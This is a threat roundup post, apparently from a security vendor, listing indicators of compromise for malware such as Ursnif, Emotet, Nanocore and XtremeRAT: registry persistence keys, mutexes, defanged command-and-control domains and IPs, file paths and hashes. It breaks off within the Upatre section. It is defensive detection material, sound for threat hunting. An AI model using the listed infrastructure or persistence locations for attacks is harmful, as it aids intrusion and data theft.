                As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


                For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                The most prevalent threats highlighted in this roundup are:
                Threat NameTypeDescription
                Win.Dropper.Ursnif-7171615-0 Dropper Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
                Win.Malware.Zusy-7171614-1 Malware Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
                Win.Malware.Nanocore-7171596-1 Malware Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
                Win.Malware.Emotet-7171351-0 Malware Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.
                Win.Trojan.XtremeRAT-7170522-1 Trojan XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
                Win.Downloader.Upatre-7170342-1 Downloader Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware.
                Win.Trojan.Gh0stRAT-7170222-1 Trojan Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
                Win.Packed.Blackshades-7168564-1 Packed Blackshades is a prevalent trojan with many capabilities including logging keystrokes, recording video from webcams, and downloading and executing additional malware.
                Win.Ransomware.Cerber-7168312-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns this is no longer the case.

                Threat Breakdown

                Win.Dropper.Ursnif-7171615-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\MICROSOFT\IAM
                Value Name: Server ID
                20
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: appmmgmt
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Install
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Scr
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Client
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Temp
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                20
                MutexesOccurrences
                Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}20
                Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}20
                Local\{B1443895-5CF6-0B1E-EE75-506F02798413}20
                {A7AAF118-DA27-71D5-1CCB-AE35102FC239}20
                {5B703C72-FEE9-4509-E0BF-12491463668D}20
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                104[.]20[.]0[.]8510
                104[.]20[.]1[.]8510
                216[.]218[.]185[.]1621
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                www[.]ietf[.]org20
                networkinpreinformation[.]in20
                Files and or directories createdOccurrences
                %APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\prefs.js20
                \{4BC230AC-2EB3-B560-90AF-42B9C45396FD}20
                %APPDATA%\ds32mapi20
                %APPDATA%\ds32mapi\dhcpxva2.exe20
                %TEMP%\<random, matching [A-F0-9]{3,4}>20
                %TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat20

                File Hashes

                11319f1628f825ee4d742eba134c1ef13f8c1a8347ecc58c9307631b1cf976f9 294b4d3a2a266b214d08237057231398e90db1c615470ed79e965ac2cf2f3f41 3828b71130a42ba1300b528c38d29217adbea7439f125a1ad8ccdaba210fa8f1 410391bb11c0ba164309a084cdcde503a9d88eac9cff7db37c1bb093e8e28f35 46b011edbfc2c0bc67f2e0220c475d78d26d792b16b66dbebef5b21c4a8b0f9e 7712f643f1f23f42e2bb3aa8de85f79641b4e8217b6411729f1edfa59057821a 8cb87415a2b184915ce8fd746e9322e4ffceb01c3f92ea0399c94c65394418fd 9046f36247c7cae4170c0e96c5e7e977ee8a3080ca8bcad90082be29684e4469 9a77b01056bd9fad89171f8917305ad10fa10bd38dac4646de194bd24b8e6894 a017725c2c204c738d0f50f60954d5450102e4414508493a704303ae8f6e7513 bb2cede8c20d3b8a4b404d153dcfcd3076d24e11a5c6d83e6a28b1de92db8c1f c34de7caf7fcda02d8c6de4cdbc7e92f16111e7de26b353f4025f4f16b21fa30 c611a64861e798aabf93ae732a457ff451c9deeabb6d63ee7dfd543ad084e6af c6ed641a2900c11e90c547a79c2e3a01dcb5d8dab1f8b59ee086c06f0375c566 d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69 d8916bb5c067fb78f96cad273e79e71c642040f81c9430c6c5ed852f0fe028ba da953a7b6829d0bf48220aed2f4c4b7498bba47d451f6b9065f6b302ef595da7 deb5817310aafedceddcab3d9ec44728aa46d68f840f177369cd717824936f58 ed12000dfd566a0b18e5fe8789bdcb2a2d121556445ac1cd4506f0aa4de6bb2a f4f92fe38729a0c7b2378e2c8c0970ce7ebd18590b59b57c2134e4021fec1a1b

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                Wsa N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Malware.Zusy-7171614-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: DA81EF4C
                8
                MutexesOccurrences
                DA81EF4C11
                \BaseNamedObjects\7E1FD1947
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                216[.]218[.]185[.]1627
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                insamertojertoq[.]cc11
                yxjsibeugmmj[.]com7
                Files and or directories createdOccurrences
                %HOMEPATH%\AppData\LocalLow\DA81EF4C8
                %APPDATA%\DA81EF4C8
                %APPDATA%\DA81EF4C\bin.exe8
                %APPDATA%\7E1FD194\bin.exe7

                File Hashes

                08663c9807b4d858fece615d7e7f132379a7c5652cacbf6584e9adbfd3b6654e 200867228d35c8f4cef7a014221e41c3232fde37f9119c8fa8d30d1121542002 32d41afc1fa28125eb77360dc293184ab6c56ad4259740fef05649f1fcefa82a 3fb0877ce9376e5756ccc847681ccd20a72673655c24814e879556d5ea3e7283 40f210bce6a972939fa3b6874d73d6fb96c654d51cc98464ef87df6002f69f21 a0c05cd49cfd545f35985f45d386a7efcc745a3f87a759b3a94e0dcf864fa60e a2312f676b9b508693f3605549b8ff33286ad61511f4a0a589ef5abeb125b24d aa658c20abd212e39434eb31193c32f09ad39454fa88e242976b619f0681d825 ba39439230cdae8c0f0777cb5a8c0d78a825e4a2820f5da439b2f1ce0d4f3522 bd672bc43098f150874d6d691465eaea12314cb9134deec98525c39cce699fb8 d38a938e9a36c1cdcc1bbe2cf8a5da54b7572a94a37e1b0c0911b6d77d975f0a

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Malware.Nanocore-7171596-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: AGP Manager
                25
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                Value Name: Form1staf
                25
                MutexesOccurrences
                Global\{d7ce90e9-f292-46be-8e05-be37399391d6}25
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                185[.]244[.]31[.]23225
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                kennethecheazu[.]ddns[.]net25
                Files and or directories createdOccurrences
                %SystemRoot%\win.ini25
                %ProgramFiles(x86)%\AGP Manager25
                %ProgramFiles(x86)%\AGP Manager\agpmgr.exe25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C525
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat25
                %APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\AGP Manager\agpmgr.exe25
                %TEMP%\Form1TIPPE.exe25
                %TEMP%\Form1TIPPE.vbs25
                %APPDATA%\8F793A96-DA80-4751-83F9-B23D8B735FB1\run.dat18
                %ProgramFiles%\SCSI Host\scsihost.exe18

                File Hashes

                186e0067550d5d1833c08c7dfd7d91e71d4d5e7d426ef3c7d1edce0554c6424c 202203455899333d624e633917a16b94ddf96eb6a03f284074aab4c1ed0c2218 3bb79bf9626bcf40d81afc303045cb4eb4267ffedee15840179aec2c50eeb82c 4c41af943d2a84a6644933e35e96342dd6195b7b9a33f6fb68c6b92949018e0a 5a1713269673c62544ea6f2a2b266d5df4ed331f1570b0dfc4aa33b3e79c5ce5 601e562e6ea29842ad3ddb246ad5f45250641d2502178c476bbefa19b3acb4e1 6d9d22a3cd4855e3673acbee8619ed213b0e330e6a4560976dda878b5101daec 73470e418c1a73792c06354c7b6d43b615d7ab246e0cff0d5dffbb2725bbfb64 76399c26a09d5953f2349c2c529fc74344160fbc639089dcab56c8409fe2bab5 8f3b8987dd405be851f06d6589ac9f9b9669ff60f5ca29e5eaa698fdd59259ef 8f54b0cb0c575486dd8ea255400b96c0d9c5f48cdf4023f6ffea59004847b627 973e1c1d3d264e764f374dc679852f27913f5afce497fa4d605118ab4e8e41d2 99f095cbbb7919e8fff151eb5175de2680b26dc94f91806343a2b48fce853f8a b46d3a615cc5d6f7ebd553c36edb963aacca5f98a271a1b91411b0b2254d4c64 c33f9cdc0fb36fd7147c15adcd46ab375138f87defedee87600270530380fbbb c4b21c6b8d558fab52a7035e290050132a3011bca864357bfdca398e61ae0ee8 ca9bec90dc6c5084d486e1b19870a9faf0d8f2571802abd08d8156a99eb1d249 cfc11408c01c5fd5eea0f19fca3a6e761d12f2173b6b3c1fd992bb7127e407a8 d1bb9db8ba25c30346a47d50956f71de7015488d8a86630bd18740df485d46fd e3baec6c7f8bc621d76b4d928e7fe3738b9703d7886a1e5ed7968700c3907ce6 ea5c81219c7ff4e8a9fce2aaf6e553a1aa5fdfb59a19d427acd66d08e82306e2 edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1 f6e98bf8216f833b1dd152150e7155c0c639d6a0323d8f7d738bd27673f5ce1b fa32101dcf6a77b32d23cc08ccdff496442b983e4233bed1f4e7d6ad0a4d8f8c fc13c2128949b11b45166489ff26970989d4dc12a456f22cbad00847c069a4a0
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                Wsa N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Malware.Emotet-7171351-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: ProxyEnable
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: ProxyServer
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: ProxyOverride
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: AutoConfigURL
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                Value Name: AutoDetect
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadDecisionReason
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadDecision
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadNetworkName
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
                Value Name: WpadDetectedUrl
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
                Value Name: CachePrefix
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
                Value Name: CachePrefix
                18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
                Value Name: CachePrefix
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: ErrorControl
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: ImagePath
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: DisplayName
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: WOW64
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
                Value Name: ObjectName
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED 18
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
                Value Name: WpadDecisionReason
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
                Value Name: WpadDecision
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
                Value Name: WpadDetectedUrl
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C
                Value Name: WpadDecisionReason
                1
                <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C
                Value Name: WpadDecision
                1
                MutexesOccurrences
                Global\I98B68E3C18
                Global\M98B68E3C18
                PEM19C18
                \BaseNamedObjects\PEM57018
                PEM74817
                \BaseNamedObjects\Global\M3C28B0E414
                \BaseNamedObjects\PEM29814
                \BaseNamedObjects\Global\I3C28B0E414
                PEM4A010
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                104[.]236[.]185[.]2518
                82[.]78[.]228[.]5718
                187[.]207[.]188[.]24818
                211[.]229[.]116[.]9718
                190[.]146[.]86[.]1804
                190[.]117[.]206[.]1534
                186[.]3[.]188[.]741
                190[.]146[.]214[.]851
                190[.]15[.]198[.]471
                187[.]188[.]166[.]1921
                88[.]215[.]2[.]291
                Files and or directories createdOccurrences
                %System32%\Microsoft\Protect\S-1-5-18\User\Preferred18
                %ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c518
                %SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe18
                %System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e88-f6c8d68fdc7a1
                %System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-8613-c59bb06aee081
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa11-7d33abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-4233abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a1c-4d33abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-b610-299ab06aee081
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a12-7333abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-7333abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-4d33abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-f332abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e87-cac8d68fdc7a1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a1c-f332abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-961f-f89bb06aee081
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa1f-7833abe498b71
                %System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e89-c6c8d68fdc7a1
                %System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-ba10-4133abe498b71

                File Hashes

                5c5acd7e82fb19bfa8a9759c1fc51e93acffb579661fc9b4455fa2f87fd05089 77cbf599e26ac6f094a75c9f3c5d15e4b53bcf9415ddecaa6d91854f16c3b19d b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088 c24216d6f195da529874a5db11c969abeadf873379c79a92759ad7378811b2e5 c379f58194bd325c7a5c95dd0d764f10781f4380586853bfe11a5ceb1d3e5aeb cc848b89bb84b0c6ae96d7191c415dcacf542aed4b2a610a0cf6b77047d7b3ef d626aacbbd26f0c7d5baee7fd6e49ee8ae2aed7c6352d39ac25134e9985400c6 d8199db09a16c0f851cb3dde4fc06183d23650295836d1a24c4d868af5acc7e3 d86584f92b6af0bfde4a4720878d5ad64f6d8c295b61f5cc345b2fcfa952758e de3841cd0ab0001fdfd28a4f3fd15d5d20c09629f7857642083e95fa9b716364 e4edfd2654acbab633fbd862641abd852cf3568614b7596373c6c4951e063998 ee21917b1596852818813250aa9a5ee37e87f7ca43120e17f09f940d058c1557 f2dcd182c3a281ee4b0026f6267fb1fafd27ae3f656941464363e4d1c0d68a28 f60672c54ec0ba38a7c7200f75859b811e1c589f84c693a82125350f89d15c94 f75984cfa2bb3c33629e71565da34a8af4b087acf91a19b1dca7481d7adff22b fcb2b44ce9f1646c1f33a82ed4afa47874166ca0c3842773d1e64fbe603de847 fce9a64d721296eaacbc034526c0719e5628575b25456436664d69cfc4155485 fe7983bcbdb91a3cfa96e68bc57ae13007041e7f048f92372a6488da79c93af7

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Trojan.XtremeRAT-7170522-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: HKLM
                15
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: HKCU
                15
                <HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
                Value Name: InstalledServer
                14
                <HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 14
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13} 6
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13}
                Value Name: StubPath
                6
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48}
                Value Name: StubPath
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48} 5
                <HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
                Value Name: ServerStarted
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B}
                Value Name: StubPath
                1
                <HKCU>\SOFTWARE\ASDAF2DS3F 1
                <HKCU>\SOFTWARE\ASDAF2DS3F
                Value Name: ServerStarted
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2}
                Value Name: StubPath
                1
                <HKCU>\SOFTWARE\ASDAF2DS3F
                Value Name: InstalledServer
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7} 1
                MutexesOccurrences
                XTREMEUPDATE15
                2H8xgwYEXIT9
                1nGM3R2HW6
                1nGM3R2HWPERSIST6
                \BaseNamedObjects\SHuJ5a0JNEXIT5
                \BaseNamedObjects\SHuJ5a0JNPERSIST5
                \BaseNamedObjects\SHuJ5a0JN5
                2H8xgwYPERSIST3
                2H8xgwY3
                asdaf2ds3f1
                asdaf2ds3fPERSIST1
                asdaf2ds3fEXIT1
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                192[.]169[.]69[.]2511
                186[.]80[.]214[.]751
                181[.]136[.]96[.]201
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                lili3030[.]duckdns[.]org6
                thork13[.]duckdns[.]org4
                explocion[.]ddns[.]net1
                toyota[.]duckdns[.]org1
                master254781[.]ddns[.]net1
                TAVO11[.]DDNS[.]NET1
                Files and or directories createdOccurrences
                %TEMP%\iJune22.exe15
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\iJune22.lnk15
                \~WELK\TLO.dll10
                \~WELK10
                %HOMEPATH%\Start Menu\Programs\Startup\iJune22.lnk8
                %APPDATA%\Microsoft\Windows\1nGM3R2HW.dat6
                %APPDATA%\Microsoft\Windows\1nGM3R2HW.cfg6
                %SystemRoot%\Hewlett6
                %SystemRoot%\Hewlett\world.exe6
                %APPDATA%\Microsoft\Windows\SHuJ5a0JN.cfg5
                %APPDATA%\Microsoft\Windows\SHuJ5a0JN.dat5
                %SystemRoot%\chrome\google.exe5
                \~GGFD5
                \~GGFD\VDF.dll5
                %SystemRoot%\chrome5
                %TEMP%\x.html4
                %SystemRoot%\InstallDir3
                %APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.dat3
                %APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg3
                %SystemRoot%\InstallDir\Server.exe2
                %APPDATA%\Microsoft\Windows\SHuJ5a0JN.xtr1
                %SystemRoot%\SysWOW64\System321
                %SystemRoot%\SysWOW64\System32\DELL1.exe1
                %APPDATA%\Microsoft\Windows\asdaf2ds3f.dat1
                %APPDATA%\Microsoft\Windows\asdaf2ds3f.cfg1
                *See JSON for more IOCs

                File Hashes

                21580ad6d39d4f863d8022706812586ef748d179974f3de5b3bae954192ac085 3885550e90bdbf469e3de0ed314b0bae355e5b531e63ebc2766100899de7e4f6 5364296fb8c7f23a30f12abaafdab87659050ae699d8eea17eca90b148959d21 593c32f771db8970231f0543e4b58bc978bbba4e2e6a0285303017040217c250 66a92f7dc4f6ad067ea257be7ceea59e89e5e5b7fccfe1808bb97db7e07741b4 6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c 7408cda78e127d3d8a7ba8b94b3b062a4a2e0e144fd15422c194dba4a2588ec2 7bf298822f352c0324495373ab984eaecb12f72277988c146496ce19e7e787ba 88fbd4fe4e2aa94375a7cd18305ef0f57722a5e83a468122e847711ebef1b4f1 a75930eb9955724aac62046b3fdff1d4b0c9ce834279915e18b44e2d290e7bde a90db1ec3e45cc03acbb2ee990ff8bd3815cb1c1ccb1ebb6ade227d4493a1d10 b3d349857cf2aa51d4781e02c414f8f34de52cd123b692b49303aaf1e9488822 dfb4eb5f09a31230bdfe457b3fd427b591b6700b62d0036a1d2380db9f464a92 ec1a87dde0b88b9a390439a57830e13063292378abc5c7c21c4fcd3e8054df28 f9cac38fde30e5c07840ec2fe6ca351d2e5f4da5fe4c8ddebd5bab3a51b83902 ff3902531d9310ea6c38cab19b575a88bcd44d9083430789f4cba4c79979193d

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Downloader.Upatre-7170342-1

                Indicators of Compromise

                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                104[.]18[.]62[.]19219
                104[.]18[.]63[.]1929
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                mmile[.]com28
                Files and or directories createdOccurrences
                %TEMP%\hfdfjdk.exe28
                %TEMP%\ckjienn.exe28
                %TEMP%\file.pe326
                %HOMEPATH%\Downloads\invoice.exe4

                File Hashes

